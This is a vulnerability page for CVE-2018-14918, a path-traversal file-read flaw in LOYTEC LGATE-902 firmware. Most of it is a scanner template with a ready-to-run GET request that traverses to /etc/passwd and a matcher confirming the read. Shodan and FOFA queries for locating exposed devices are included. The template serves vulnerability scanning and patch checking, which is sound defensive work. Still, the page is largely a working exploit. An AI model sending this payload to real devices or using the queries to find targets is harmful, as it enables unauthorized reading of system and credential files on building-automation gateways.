CVE-2018-14918: LOYTEC LGATE-902 6.3.2 - Local File Inclusion

2025-08-01 LOYTEC LGATE-902 6.3.2 PoC Public

Description

LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords.

PoC

id: CVE-2018-14918

info:
  name: LOYTEC LGATE-902 6.3.2 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the device, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest firmware update provided by LOYTEC to fix the LFI vulnerability.
  reference:
    - https://seclists.org/fulldisclosure/2019/Apr/12
    - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-14918
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/HimmelAward/Goby_POC
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-14918
    cwe-id: CWE-22
    epss-score: 0.18611
    epss-percentile: 0.97111
    cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: loytec
    product: lgate-902_firmware
    shodan-query:
      - http.html:"LGATE-902"
      - http.html:"lgate-902"
    fofa-query: body="lgate-902"
  tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022079c7879374b739b4ba4becf47915b10de9b64626343391b18e283e9c04ea12d2022100ce75e707501d914afe1d81610d0c4420af4901db8c6cb044047b778a07d04a61:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities